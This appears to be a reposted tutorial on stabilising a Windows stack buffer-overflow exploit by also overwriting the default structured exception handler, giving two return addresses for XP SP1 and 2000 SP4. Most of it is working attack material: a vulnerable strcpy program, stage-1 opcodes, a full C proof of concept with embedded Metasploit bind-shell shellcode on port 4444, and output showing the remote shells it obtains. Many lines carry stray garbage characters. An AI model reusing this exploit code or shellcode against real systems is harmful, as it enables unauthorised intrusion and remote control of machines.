Exploiting Default Exception Handler to Increase Exploit Sta

韩冰

The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.
3 j0 x8 w9 ^8 t0 g
( V7 ?0 z* S. @" m; n[Buf] <- Shellcode
! e: v8 D% N: k" y8 v. o! F. o8 O[Return Address] <- jmp register (for Windows XP sp1)
, B9 Q. T) g$ x; u5 G3 `[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
! e2 `4 ?. p) m; B3 l[SE Handler] <- jmp register (for Win2k sp4)
[Stage1 Shellcode] <- stage1 shellcode for win2k
( f5 U; N4 V& |1 _" G
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses
( \5 _. B4 t( W. {% O4 n
  M+ R/ d3 ?% F4 x+ s0 HNecessary Tools:
1 V9 ?7 X6 \- u+ h0 ~+ B& w$ V3 R- OllyDBG
( p6 ^7 P- o, A/ P1 t/ `- C/C++ Compiler
0 @" q8 z  W. \& a- nasm
- Sac
( }* X; C# t; Y( {5 K; ]
Vulnerable Code:
//lamebuf.c
8 B- m' i  `5 a' s1 q#include<stdio.h>
; o/ a8 V* {' C* C3 q#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){

char buf[512];
" N, Q( f( n# F& i# M; Kchar buf1[1024]; // <- simulate a stack
2 o+ O; n- m. Y9 I: `. z4 R8 x& Z//DebugBreak();
. h- d) D9 p. |! Tif (argc != 2){ return -1; }

strcpy(buf,argv[1]);
* {0 G9 K$ ?8 a* B) J4 |return 0x0;
}

% d1 W/ ~0 m9 B$ V+ ?Getting Started:
- e* w2 D. b7 q) K' P7 h/ ]Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:

7 x+ T; ^  ]+ Q& E' HEAX 00000000
ECX 00321404
EDX 00414141
& V5 `) m8 P( r3 GEBX 7FFDF000
3 B$ c. X* ?  k/ j+ TESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
; h* k+ W' _" w; l, U- @ESI 77D4595F
EDI 77F59037 ntdll.77F59037
' z. C& ]1 @: [  B+ f8 ~; ]2 rEIP 41414141

6 r# d: u! X8 L. l1 G" [3 BLets take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
4 ]3 g( c9 V  k& N8 e& w& x0x0012FFB4 41414141 SE Handler

  ]! L$ X$ o7 M: Z  UWe successfully overwrote the return address and the default exception handler.
. ]- ?1 k  G. ~: y; b; y3 ?
Primary Return Address (Windows XP SP1 EN):
; r7 P/ i: M) z, z4 c9 tThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
1 y2 e; h( S' e/ e
5 A6 e1 D- d) ^6 \9 l  T" s! e& CSecondary Return Address (Windows 2000 SP4 EN):
2 ^; L  W) {5 V7 dThe secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
, a# D) ~& O# V
Proof Of Concept:
7 _* _( \1 x" L4 h// exploit.c
// Tal zeltzer - [Double Return] //

#include<stdio.h>
" _. {- r  ~5 p- I. {1 v#include<string.h>
#include<windows.h>
/ \4 P& p7 d& H- {( f4 Y$ ~
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx
/ ^# k: ~1 t4 M1 s  {) `+ }
// Stage1 For WinXP Sp1 English
& x* P7 ?: \7 j1 K9 r" r, A5 munsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
+ I; [4 w% j  Z
. @2 N7 p$ O+ p3 j0 `1 i( |2 s// Stage1 For Win2k Sp4 English
+ k9 V( f' g5 u9 |" V* v3 `unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
* m5 s9 D/ P! W/ tunsigned char shellcode[] =
0 {# d5 }. |3 ]+ {, O"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
% |% u  P7 [0 }& c) n& f"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
, {, ?9 c# Q6 H4 w0 N$ b"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
3 T- [0 l3 w2 i9 O8 z2 u1 r"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
" V; h% l( n! z" b: c: ?- t* J6 a"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
! P7 T- t- c$ P7 [5 l6 R"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
4 [4 z' v! Y& @/ e4 C0 f2 Z+ f1 R"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
& I! Y% C4 {% q2 C"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
' C+ ?2 n7 X5 B( E( ]% U  u+ [; u, W"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
+ k5 ]- ^5 g4 s  b& b' J+ Z"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
' K2 [8 _9 V3 x- I9 J2 E3 D! @$ b% ~"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
6 |  o* E8 ?; e6 k5 P% `# n"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
& m# s$ U1 n# I& }4 p' o9 z/ O"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
, n- Q% Q. [5 q1 w1 e0 i. ?"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
7 U2 i5 z2 \3 w# q+ e6 H"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
8 X1 V/ o3 B+ U  P"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
' A  D( [) `/ R8 I  Z. T) h"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
& b8 E$ |* ?$ B

int main(int argc,char *argv[]){
- q0 G2 C& g  x9 d, \6 v
char *bufExe[3];
char buf[2048];
1 Y8 j$ e8 P7 o! T0 nbufExe[0] = "lamebuf.exe";
bufExe[2] = NULL;
  n3 q- ]$ i9 h
6 W1 N8 c  ?# ]3 R% \memset(buf,0x0,sizeof(buf));
memset(buf,0x90,1652);
memcpy(&buf[24],shellcode,sizeof(shellcode)-1);
7 \$ i% R2 a/ ?& s( K# b, M. d
; C) ^# p% N- W6 H3 B3 j2 v  Omemcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode
3 N' b: v6 E- }
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
9 z) d0 \' R2 V) ]( M7 o3 I*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
9 O! p% A7 |0 g+ L" d- T, w1 P, k*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en
+ ~& u9 E6 {6 l2 X

bufExe[1] = buf;
, o+ T9 M9 y. G//Execute the vulnerable application
execve(bufExe[0],bufExe,NULL);

& E' w* U/ s& {# J! e! dreturn 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
# l0 W( ]3 f& ~  k$ k$ BC:\>telnet 127.0.0.1 4444
1 X' ^3 Y- z' ~) Z
Microsoft Windows XP [Version 5.1.2600]
0 D7 i  S3 l8 }# `, \& @4 x(C) Copyright 1985-2001 Microsoft Corp.

) p2 p7 j* K+ _C:\>
1 @; N* k- g4 v' G% T# `4 F( k
Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444
2 Q7 J* K& Z' c8 b, o% [* T
1 {) e- x  U; L0 y9 VMicrosoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.